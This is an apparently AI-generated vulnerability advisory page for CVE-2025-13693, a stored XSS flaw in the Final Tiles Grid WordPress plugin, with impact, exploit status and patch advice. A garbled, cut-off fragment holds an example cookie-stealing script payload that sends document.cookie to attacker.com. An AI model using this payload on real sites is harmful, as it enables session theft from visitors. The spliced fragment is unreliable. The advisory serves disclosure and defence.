
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-13693 is a Stored Cross-Site Scripting (XSS) vulnerability in the Image Photo Gallery Final Tiles Grid plugin for WordPress, developed by WPChill (formerly Macho Themes). The flaw exists in all versions up to and including 3.6.8, where the 'Custom scripts' setting lacks sufficient input sanitization and output escaping. Authenticated attackers with Author-level access or higher can inject arbitrary web scripts that execute in the browsers of any user visiting an affected page. It was published on December 21, 2025, and carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically in the plugin's gallery-class.php file where user-supplied content from the 'Custom scripts' setting is stored and later rendered without proper sanitization or escaping (Wordfence, WordPress Trac). The attack vector is network-based with low attack complexity, requiring only low privileges (Author role) and no user interaction beyond the victim visiting an injected page. The scope is changed, meaning the injected script executes in the context of other users' browsers rather than the attacker's session. A patch changeset is publicly visible in the WordPress plugin repository (WordPress Changeset).
Successful exploitation allows an authenticated attacker with Author-level access to persistently inject malicious JavaScript into WordPress pages, which executes in the browsers of all subsequent visitors. This can lead to session cookie theft, credential harvesting, redirection to malicious sites, defacement, or delivery of drive-by malware to site visitors. While availability is not directly impacted, confidentiality and integrity are both affected at a low-to-moderate level across the changed scope of all site visitors (Wordfence, Red Hat CVE).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-13693 as of the available data. The EPSS score is approximately 0.03%, indicating a very low probability of exploitation in the near term (Feedly). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum an Author-level WordPress account, which limits the attack surface compared to unauthenticated vulnerabilities.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the 'Custom scripts' field and save the settings.<script> tags or JavaScript event handlers (e.g., onerror, onload) stored in the wp_options or gallery-related database tables associated with the plugin.Site administrators should update the Image Photo Gallery Final Tiles Grid plugin to version 3.6.9 or later, which contains the fix for insufficient input sanitization and output escaping in the 'Custom scripts' setting (Wordfence, WordPress Changeset). As a temporary workaround, restrict Author-level user permissions or disable the 'Custom scripts' feature until the plugin is updated. Implementing a Web Application Firewall (WAF) with XSS filtering rules can provide an additional layer of defense.
The vulnerability was reported and disclosed by Wordfence, which assigned the CVE and published the advisory on December 21, 2025. No notable independent researcher commentary or significant media coverage beyond standard vulnerability aggregator listings (VulDB, Vulners, Tenable, ENISA EUVD) has been identified (Wordfence, ENISA EUVD).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."